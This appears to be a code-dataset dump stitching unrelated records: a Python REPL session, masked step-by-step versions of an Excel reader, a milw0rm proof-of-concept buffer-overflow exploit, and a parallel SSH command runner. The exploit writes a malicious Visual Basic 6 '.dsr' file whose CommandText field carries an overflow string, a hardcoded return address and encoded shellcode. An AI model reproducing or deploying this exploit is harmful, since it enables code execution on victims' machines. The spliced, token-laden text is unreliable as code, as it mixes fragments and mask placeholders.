"step-1": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 16 21:26:03 2018\n\n@author: Brandon\n\"\"\"os.getcwd()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nNameError: name 'os' is not definimport os\n>>> os.getcwd()\n'C:\\\\Users\\\\Brandon\\\\AppData\\\\Local\\\\Programs\\\\Python\\\\Python36-32'\n>>> os.chdir()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nTypeError: Required argument 'path' (pos 1) not found\n>>> os.chdir()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nTypeError: Required argument 'path' (pos 1) not found\n>>>\n>>> os.chdir(\"C:\\\\Users\\\\Brandon\\Documents\")\n>>> os.getcwd()\n'C:\\\\Users\\\\Brandon\\\\Documents'\n>>> os.makedirs()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nTypeError: makedirs() missing 1 required positional argument: 'name'\n>>> os.makedirs(\"yu\")\n>>> os.chdir(\"\\\\yu\")\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nFileNotFoundError: [WinError 2] The system cannot find the file specified: '\\\\yu'\n>>> os.chdir(\".\\\\yu\")\n>>> os.getcwd()\n'C:\\\\Users\\\\Brandon\\\\Documents\\\\yu'\n>>> os.path.getsize(yu)\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nNameError: name 'yu' is not defined\n>>> os.path.getsize()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nTypeError: getsize() missing 1 required positional argument: 'filename'\n>>> os.path.getsize()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nTypeError: getsize() missing 1 required positional argument: 'filename'\n>>> os.path.exists()\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nTypeError: exists() missing 1 required positional argument: 'path'\n>>> os.path.exits(\"C:\\\\Users\\\\Brandon\\\\Documents\\\\yu\")\nTraceback (most recent call last):\n File \"<stdin>\", line 1, in <module>\nAttributeError: module 'ntpath' has no attribute 'exits'\n>>> os.path.exists(\"C:\\\\Users\\\\Brandon\\\\Documents\\\\yu\")\nTrue\n>>>\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def excel_table_byindex(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx',
colnameindex=0, by_index=0):
data = open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')
table = data.sheets()[by_index]
nrows = table.nrows
ncols = table.ncols
colnames = table.row_values(colnameindex)
list = []
for rownum in range(1, nrows):
row = table.row_values(rownum)
if row:
app = {}
for i in range(len(colnames)):
app[colnames[i]] = row[i]
            list.append(app)
return list
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx'):
try:
data = xlrd.open_workbook('D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')
return data
except Exception as e:
print(str(e))
def excel_table_byindex(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx',
colnameindex=0, by_index=0):
data = open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')
table = data.sheets()[by_index]
nrows = table.nrows
ncols = table.ncols
colnames = table.row_values(colnameindex)
list = []
for rownum in range(1, nrows):
row = table.row_values(rownum)
if row:
app = {}
for i in range(len(colnames)):
app[colnames[i]] = row[i]
            list.append(app)
return list
<|reserved_special_token_1|>
import xdrlib, sys
import xlrd
def open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx'):
try:
data = xlrd.open_workbook('D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')
return data
except Exception as e:
print(str(e))
def excel_table_byindex(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx',
colnameindex=0, by_index=0):
data = open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')
table = data.sheets()[by_index]
nrows = table.nrows
ncols = table.ncols
colnames = table.row_values(colnameindex)
list = []
for rownum in range(1, nrows):
row = table.row_values(rownum)
if row:
app = {}
for i in range(len(colnames)):
app[colnames[i]] = row[i]
            list.append(app)
return list
<|reserved_special_token_1|>
import xdrlib,sys
import xlrd
def open_excel(file='D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx'):
try:
data=xlrd.open_workbook('D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx')
return data
except Exception as e:
print (str(e))
def excel_table_byindex(file='D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx',colnameindex=0,by_index=0):
data=open_excel(file='D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx')
table=data.sheets()[by_index]
nrows=table.nrows
ncols=table.ncols
colnames=table.row_values(colnameindex)
list=[]
for rownum in range(1,nrows):
row=table.row_values(rownum)
if row:
app={}
for i in range(len(colnames)):
app[colnames[i]]=row[i]
            list.append(app)
return list
|
flexible
|
{
"blob_id": "d211594a034489d36a5648bf0b926fbd734fd0df",
"index": 6928,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef excel_table_byindex(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx',\n colnameindex=0, by_index=0):\n data = open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n table = data.sheets()[by_index]\n nrows = table.nrows\n ncols = table.ncols\n colnames = table.row_values(colnameindex)\n list = []\n for rownum in range(1, nrows):\n row = table.row_values(rownum)\n if row:\n app = {}\n for i in range(len(colnames)):\n app[colnames[i]] = row[i]\n list.apend(app)\n return list\n",
"step-3": "<mask token>\n\n\ndef open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx'):\n try:\n data = xlrd.open_workbook('D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n return data\n except Exception as e:\n print(str(e))\n\n\ndef excel_table_byindex(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx',\n colnameindex=0, by_index=0):\n data = open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n table = data.sheets()[by_index]\n nrows = table.nrows\n ncols = table.ncols\n colnames = table.row_values(colnameindex)\n list = []\n for rownum in range(1, nrows):\n row = table.row_values(rownum)\n if row:\n app = {}\n for i in range(len(colnames)):\n app[colnames[i]] = row[i]\n list.apend(app)\n return list\n",
"step-4": "import xdrlib, sys\nimport xlrd\n\n\ndef open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx'):\n try:\n data = xlrd.open_workbook('D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n return data\n except Exception as e:\n print(str(e))\n\n\ndef excel_table_byindex(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx',\n colnameindex=0, by_index=0):\n data = open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n table = data.sheets()[by_index]\n nrows = table.nrows\n ncols = table.ncols\n colnames = table.row_values(colnameindex)\n list = []\n for rownum in range(1, nrows):\n row = table.row_values(rownum)\n if row:\n app = {}\n for i in range(len(colnames)):\n app[colnames[i]] = row[i]\n list.apend(app)\n return list\n",
"step-5": "import xdrlib,sys\nimport xlrd\ndef open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx'):\n try:\n data=xlrd.open_workbook('D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')\n return data\n except Exception as e:\n print (str(e))\ndef excel_table_byindex(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx',colnameindex=0,by_index=0):\n data=open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')\n table=data.sheets()[by_index]\n nrows=table.nrows\n ncols=table.ncols\n colnames=table.row_values(colnameindex)\n list=[]\n for rownum in range(1,nrows):\n row=table.row_values(rownum)\n if row:\n app={}\n for i in range(len(colnames)):\n app[colnames[i]]=row[i]\n list.apend(app)\n return list\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#usage: exploit.py
print "-----------------------------------------------------------------------"
print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Once you create the file, open it with Visual Basic 6 and click on"
print " command name."
print "-----------------------------------------------------------------------"
buff = "A" * 555
get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
nop = "\x90" * 12
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
)
dsrfile = (
"VERSION 5.00\n"
"Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n"
" ClientHeight = 6315\n"
" ClientLeft = 0\n"
" ClientTop = 0\n"
" ClientWidth = 7980\n"
" _ExtentX = 14076\n"
" _ExtentY = 11139\n"
" FolderFlags = 1\n"
' TypeLibGuid = "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n'
' TypeInfoGuid = "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n'
" TypeInfoCookie = 0\n"
" Version = 4\n"
" NumConnections = 1\n"
" BeginProperty Connection1\n"
' ConnectionName = "Connection1"\n'
" ConnDispId = 1001\n"
" SourceOfData = 3\n"
' ConnectionSource= ""\n'
" Expanded = -1 'True\n"
" QuoteChar = 96\n"
" SeparatorChar = 46\n"
" EndProperty\n"
" NumRecordsets = 1\n"
" BeginProperty Recordset1\n"
' CommandName = "Command1"\n'
" CommDispId = 1002\n"
" RsDispId = 1003\n"
' CommandText = "' + buff + get_EIP + nop + shellcode + nop + '"\n'
' ActiveConnectionName= "Connection1"\n'
" CommandType = 2\n"
" dbObjectType = 1\n"
" Locktype = 3\n"
" IsRSReturning = -1 'True\n"
" NumFields = 1\n"
" BeginProperty Field1\n"
" Precision = 10\n"
" Size = 4\n"
" Scale = 0\n"
" Type = 3\n"
' Name = "ID"\n'
' Caption = "ID"\n'
" EndProperty\n"
" NumGroups = 0\n"
" ParamCount = 0\n"
" RelationCount = 0\n"
" AggregateCount = 0\n"
" EndProperty\n"
"End\n"
'Attribute VB_Name = "DataEnvironment1"\n'
"Attribute VB_GlobalNameSpace = False\n"
"Attribute VB_Creatable = True\n"
"Attribute VB_PredeclaredId = True\n"
"Attribute VB_Exposed = False\n"
)
try:
out_file = open("DataEnvironment1.dsr",'w')
out_file.write(dsrfile)
out_file.close()
print "\nFILE CREATION COMPLETED!\n"
except:
print " \n -------------------------------------"
print " Usage: exploit.py"
print " -------------------------------------"
print "\nAN ERROR OCCURS DURING FILE CREATION!"
# milw0rm.com [2008-04-04]
|
normal
|
{
"blob_id": "40a73ceeeb310c490fe2467511966679a1afa92b",
"index": 9585,
"step-1": "#usage: exploit.py\n\nprint \"-----------------------------------------------------------------------\"\nprint ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 \".dsr\" File Handling BoF\\n'\nprint \" author: shinnai\"\nprint \" mail: shinnai[at]autistici[dot]org\"\nprint \" site: http://shinnai.altervista.org\\n\"\nprint \" Once you create the file, open it with Visual Basic 6 and click on\"\nprint \" command name.\"\nprint \"-----------------------------------------------------------------------\"\n\nbuff = \"A\" * 555\n\nget_EIP = \"\\xFF\\xBE\\x3F\\x7E\" #call ESP from user32.dll\n\nnop = \"\\x90\" * 12\n\nshellcode = (\n \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\n \"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\n \"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\n \"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\n \"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\"\n \"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x38\\x45\\x44\\x4e\\x43\\x4b\\x38\\x4e\\x47\"\n \"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x48\\x4f\\x54\\x4a\\x41\\x4b\\x38\"\n \"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x48\\x46\\x33\\x4b\\x48\"\n \"\\x41\\x50\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x48\\x42\\x4c\"\n \"\\x46\\x47\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e\"\n \"\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x52\\x46\\x30\\x45\\x37\\x45\\x4e\\x4b\\x58\"\n \"\\x4f\\x45\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x48\\x4e\\x30\\x4b\\x44\"\n \"\\x4b\\x48\\x4f\\x35\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x51\\x4b\\x38\"\n \"\\x41\\x50\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x33\"\n \"\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x34\\x42\\x33\\x45\\x38\\x42\\x4c\\x4a\\x47\"\n \"\\x4e\\x30\\x4b\\x38\\x42\\x34\\x4e\\x50\\x4b\\x58\\x42\\x47\\x4e\\x41\\x4d\\x4a\"\n \"\\x4b\\x58\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x48\\x42\\x48\\x42\\x4b\"\n \"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x4a\\x56\\x4e\\x43\\x4f\\x55\\x41\\x33\"\n \"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x37\"\n \"\\x42\\x55\\x4a\\x36\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x35\\x4a\\x36\\x4a\\x59\"\n \"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56\"\n \"\\x4e\\x46\\x43\\x56\\x50\\x32\\x45\\x46\\x4a\\x37\\x45\\x36\\x42\\x50\\x5a\"\n )\n\ndsrfile = (\n \"VERSION 5.00\\n\"\n \"Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\\n\"\n \" ClientHeight = 6315\\n\"\n \" ClientLeft = 0\\n\"\n \" ClientTop = 0\\n\"\n \" ClientWidth = 7980\\n\"\n \" _ExtentX = 14076\\n\"\n \" _ExtentY = 11139\\n\"\n \" FolderFlags = 1\\n\"\n ' TypeLibGuid = \"{D7133993-3B5A-4667-B63B-749EF16A1840}\"\\n'\n ' TypeInfoGuid = \"{050E7898-66AC-4150-A213-47C7725D7E7E}\"\\n'\n \" TypeInfoCookie = 0\\n\"\n \" Version = 4\\n\"\n \" NumConnections = 1\\n\"\n \" BeginProperty Connection1\\n\"\n ' ConnectionName = \"Connection1\"\\n'\n \" ConnDispId = 1001\\n\"\n \" SourceOfData = 3\\n\"\n ' ConnectionSource= \"\"\\n'\n \" Expanded = -1 'True\\n\"\n \" QuoteChar = 96\\n\"\n \" SeparatorChar = 46\\n\"\n \" EndProperty\\n\"\n \" NumRecordsets = 1\\n\"\n \" BeginProperty Recordset1\\n\"\n ' CommandName = \"Command1\"\\n'\n \" CommDispId = 1002\\n\"\n \" RsDispId = 1003\\n\"\n ' CommandText = \"' + buff + get_EIP + nop + shellcode + nop + 
'\"\\n'\n ' ActiveConnectionName= \"Connection1\"\\n'\n \" CommandType = 2\\n\"\n \" dbObjectType = 1\\n\"\n \" Locktype = 3\\n\"\n \" IsRSReturning = -1 'True\\n\"\n \" NumFields = 1\\n\"\n \" BeginProperty Field1\\n\"\n \" Precision = 10\\n\"\n \" Size = 4\\n\"\n \" Scale = 0\\n\"\n \" Type = 3\\n\"\n ' Name = \"ID\"\\n'\n ' Caption = \"ID\"\\n'\n \" EndProperty\\n\"\n \" NumGroups = 0\\n\"\n \" ParamCount = 0\\n\"\n \" RelationCount = 0\\n\"\n \" AggregateCount = 0\\n\"\n \" EndProperty\\n\"\n \"End\\n\"\n 'Attribute VB_Name = \"DataEnvironment1\"\\n'\n \"Attribute VB_GlobalNameSpace = False\\n\"\n \"Attribute VB_Creatable = True\\n\"\n \"Attribute VB_PredeclaredId = True\\n\"\n \"Attribute VB_Exposed = False\\n\"\n )\n\ntry:\n out_file = open(\"DataEnvironment1.dsr\",'w')\n out_file.write(dsrfile)\n out_file.close()\n print \"\\nFILE CREATION COMPLETED!\\n\"\nexcept:\n print \" \\n -------------------------------------\"\n print \" Usage: exploit.py\"\n print \" -------------------------------------\"\n print \"\\nAN ERROR OCCURS DURING FILE CREATION!\"\n\n# milw0rm.com [2008-04-04]\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def worker(server, commands):
output = {}
output['server'] = server
session = sgc.Ssh(server=server)
if session.ping == 'Alive':
session.connect()
if session.connection == False:
output['commands'] = session.connection_error
else:
if options.script:
if not os.path.exists(options.script):
output['commands'
] = 'Error: the script location {} not exists'.format(
options.script)
print('Error: the script location {} not exists'.format
(options.script))
else:
curdir = os.getcwd()
folder, file = os.path.split(options.script)
if not folder:
folder = curdir
try:
os.chdir(folder)
sftp = session.Sftp()
sftp.chdir('/tmp')
sftp.put(file, file)
commands = '/tmp/' + file,
session.execute(('/bin/chmod a+x /tmp/' + file,))
except Exception as error:
output['commands'] = error
output['commands'] = session.execute(commands)
else:
output['commands'] = 'Down'
queue.put(output)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parser.add_argument('-f', action='store', required=True, dest='file', help=
'servers list')
<|reserved_special_token_0|>
group.add_argument('-c', action='store', dest='commands', help=
'commands need to execute')
group.add_argument('-S', action='store', dest='script', help=
'local script which need to execute on remote servers')
<|reserved_special_token_0|>
if os.path.getsize(options.file) == 0:
print('Error: server list file is empty')
exit(2)
<|reserved_special_token_0|>
for line in file:
line = line.strip('\n')
if len(line) == 0 or line in servers:
continue
servers.append(line)
if not servers:
print('Error: server list file is empty')
exit(2)
<|reserved_special_token_0|>
if options.commands and re.match('[a-zA-Z0-9]', options.commands):
for item in options.commands.split(','):
item = item.replace('"', '')
commands.append(item)
if not commands:
print('Error: command list is empty')
parser.print_help()
exit(2)
if options.script:
commands = ['/tmp/' + os.path.basename(options.script)]
<|reserved_special_token_0|>
def worker(server, commands):
output = {}
output['server'] = server
session = sgc.Ssh(server=server)
if session.ping == 'Alive':
session.connect()
if session.connection == False:
output['commands'] = session.connection_error
else:
if options.script:
if not os.path.exists(options.script):
output['commands'
] = 'Error: the script location {} not exists'.format(
options.script)
print('Error: the script location {} not exists'.format
(options.script))
else:
curdir = os.getcwd()
folder, file = os.path.split(options.script)
if not folder:
folder = curdir
try:
os.chdir(folder)
sftp = session.Sftp()
sftp.chdir('/tmp')
sftp.put(file, file)
commands = '/tmp/' + file,
session.execute(('/bin/chmod a+x /tmp/' + file,))
except Exception as error:
output['commands'] = error
output['commands'] = session.execute(commands)
else:
output['commands'] = 'Down'
queue.put(output)
<|reserved_special_token_0|>
while servers:
if len(mp.active_children()) < limits:
server = servers.pop()
proc = mp.Process(target=worker, args=(server, commands), name=server)
procs.append(proc)
proc.start()
while mp.active_children():
if not queue.empty():
item = queue.get()
if item['commands'] == 'Down':
print('Server: {} : Unable to ping'.format(item['server']))
continue
if type(item['commands']) != type(dict()):
print('Server: {} : {}'.format(item['server'], item['commands']))
continue
print('Server: {}'.format(item['server']))
for command in commands:
if item['commands'][command][0] != '':
if options.script:
print('Output of Command: {}'.format(options.script))
else:
print('Output of Command: {}'.format(command))
print(item['commands'][command][0])
if item['commands'][command][1] != '':
print('Error occurred on command: {}'.format(command))
print(item['commands'][command][1])
print(
'**************************************************************************'
)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parser = argparse.ArgumentParser(description=
'Execute commands parallel on remote servers')
parser.add_argument('-f', action='store', required=True, dest='file', help=
'servers list')
group = parser.add_mutually_exclusive_group()
group.add_argument('-c', action='store', dest='commands', help=
'commands need to execute')
group.add_argument('-S', action='store', dest='script', help=
'local script which need to execute on remote servers')
options = parser.parse_args()
if os.path.getsize(options.file) == 0:
print('Error: server list file is empty')
exit(2)
file = open(options.file, 'r')
servers = []
for line in file:
line = line.strip('\n')
if len(line) == 0 or line in servers:
continue
servers.append(line)
if not servers:
print('Error: server list file is empty')
exit(2)
commands = []
if options.commands and re.match('[a-zA-Z0-9]', options.commands):
for item in options.commands.split(','):
item = item.replace('"', '')
commands.append(item)
if not commands:
print('Error: command list is empty')
parser.print_help()
exit(2)
if options.script:
commands = ['/tmp/' + os.path.basename(options.script)]
queue = mp.Queue()
def worker(server, commands):
output = {}
output['server'] = server
session = sgc.Ssh(server=server)
if session.ping == 'Alive':
session.connect()
if session.connection == False:
output['commands'] = session.connection_error
else:
if options.script:
if not os.path.exists(options.script):
output['commands'
] = 'Error: the script location {} not exists'.format(
options.script)
print('Error: the script location {} not exists'.format
(options.script))
else:
curdir = os.getcwd()
folder, file = os.path.split(options.script)
if not folder:
folder = curdir
try:
os.chdir(folder)
sftp = session.Sftp()
sftp.chdir('/tmp')
sftp.put(file, file)
commands = '/tmp/' + file,
session.execute(('/bin/chmod a+x /tmp/' + file,))
except Exception as error:
output['commands'] = error
output['commands'] = session.execute(commands)
else:
output['commands'] = 'Down'
queue.put(output)
procs = []
limits = mp.cpu_count()
while servers:
if len(mp.active_children()) < limits:
server = servers.pop()
proc = mp.Process(target=worker, args=(server, commands), name=server)
procs.append(proc)
proc.start()
while mp.active_children():
if not queue.empty():
item = queue.get()
if item['commands'] == 'Down':
print('Server: {} : Unable to ping'.format(item['server']))
continue
if type(item['commands']) != type(dict()):
print('Server: {} : {}'.format(item['server'], item['commands']))
continue
print('Server: {}'.format(item['server']))
for command in commands:
if item['commands'][command][0] != '':
if options.script:
print('Output of Command: {}'.format(options.script))
else:
print('Output of Command: {}'.format(command))
print(item['commands'][command][0])
if item['commands'][command][1] != '':
print('Error occurred on command: {}'.format(command))
print(item['commands'][command][1])
print(
'**************************************************************************'
)
<|reserved_special_token_1|>
import sgc
import multiprocessing as mp
import argparse
import os
import re
parser = argparse.ArgumentParser(description=
'Execute commands parallel on remote servers')
parser.add_argument('-f', action='store', required=True, dest='file', help=
'servers list')
group = parser.add_mutually_exclusive_group()
group.add_argument('-c', action='store', dest='commands', help=
'commands need to execute')
group.add_argument('-S', action='store', dest='script', help=
'local script which need to execute on remote servers')
options = parser.parse_args()
if os.path.getsize(options.file) == 0:
print('Error: server list file is empty')
exit(2)
file = open(options.file, 'r')
servers = []
for line in file:
line = line.strip('\n')
if len(line) == 0 or line in servers:
continue
servers.append(line)
if not servers:
print('Error: server list file is empty')
exit(2)
commands = []
if options.commands and re.match('[a-zA-Z0-9]', options.commands):
for item in options.commands.split(','):
item = item.replace('"', '')
commands.append(item)
if not commands:
print('Error: command list is empty')
parser.print_help()
exit(2)
if options.script:
commands = ['/tmp/' + os.path.basename(options.script)]
queue = mp.Queue()
def worker(server, commands):
output = {}
output['server'] = server
session = sgc.Ssh(server=server)
if session.ping == 'Alive':
session.connect()
if session.connection == False:
output['commands'] = session.connection_error
else:
if options.script:
if not os.path.exists(options.script):
output['commands'
] = 'Error: the script location {} not exists'.format(
options.script)
print('Error: the script location {} not exists'.format
(options.script))
else:
curdir = os.getcwd()
folder, file = os.path.split(options.script)
if not folder:
folder = curdir
try:
os.chdir(folder)
sftp = session.Sftp()
sftp.chdir('/tmp')
sftp.put(file, file)
commands = '/tmp/' + file,
session.execute(('/bin/chmod a+x /tmp/' + file,))
except Exception as error:
output['commands'] = error
output['commands'] = session.execute(commands)
else:
output['commands'] = 'Down'
queue.put(output)
procs = []
limits = mp.cpu_count()
while servers:
if len(mp.active_children()) < limits:
server = servers.pop()
proc = mp.Process(target=worker, args=(server, commands), name=server)
procs.append(proc)
proc.start()
while mp.active_children():
if not queue.empty():
item = queue.get()
if item['commands'] == 'Down':
print('Server: {} : Unable to ping'.format(item['server']))
continue
if type(item['commands']) != type(dict()):
print('Server: {} : {}'.format(item['server'], item['commands']))
continue
print('Server: {}'.format(item['server']))
for command in commands:
if item['commands'][command][0] != '':
if options.script:
print('Output of Command: {}'.format(options.script))
else:
print('Output of Command: {}'.format(command))
print(item['commands'][command][0])
if item['commands'][command][1] != '':
print('Error occurred on command: {}'.format(command))
print(item['commands'][command][1])
print(
'**************************************************************************'
)
<|reserved_special_token_1|>
import sgc
import multiprocessing as mp
# import json
import argparse
import os
import re
#Process argument passed to the script
parser = argparse.ArgumentParser(description='Execute commands parallel on remote servers')
parser.add_argument('-f', action='store', required=True, dest='file', help='servers list')
group = parser.add_mutually_exclusive_group()
group.add_argument('-c', action='store', dest='commands', help='commands need to execute')
group.add_argument('-S', action='store', dest='script', help='local script which need to execute on remote servers')
options = parser.parse_args()
#Exit if input file is zero
if os.path.getsize(options.file) == 0:
print("Error: server list file is empty")
exit(2)
#Process the input file and store the server in list variable servers
file = open(options.file, 'r')
servers = []
for line in file:
line = line.strip('\n')
if len(line) == 0 or line in servers:
continue
servers.append(line)
#Exit the script if the servers list is empty
if not servers:
print("Error: server list file is empty")
exit(2)
#Process the commands passed into the script
commands = []
if options.commands and re.match(r'[a-zA-Z0-9]', options.commands):
for item in options.commands.split(','):
item = item.replace('"', '')
commands.append(item)
#Exit the script if command list is empty
if not commands:
print("Error: command list is empty")
parser.print_help()
exit(2)
if options.script:
commands = ['/tmp/'+os.path.basename(options.script)]
#servers = ['localhost', 'centos6web', 'fedora.kannan.lab', '127.0.0.1', '127.0.0.2', '127.0.0.3', '127.0.0.4',
# '127.0.0.100', '127.0.0.200', '127.0.0.150', '127.0.0.10', '127.0.0.20', '127.0.0.30']
# servers = ['centos6web', 'fedora.kannan.lab']
# commands = ('sudo shutdown -h 0',)
# commands = ('uptime', 'uname -a', 'sudo fdisk -l')
queue = mp.Queue()
def worker(server, commands):
# print(mp.current_process().name)
output = {}
output['server'] = server
session = sgc.Ssh(server=server)
# print("Connected to server {}".format(server))
# else:
# print("Unable to connect to server {}\n{}".format(server, session.connection_error))
if session.ping == 'Alive':
session.connect()
# print(session.connection)
if session.connection == False:
output['commands'] = session.connection_error
else:
if options.script:
if not os.path.exists(options.script):
output['commands'] = "Error: the script location {} not exists".format(options.script)
print("Error: the script location {} not exists".format(options.script))
else:
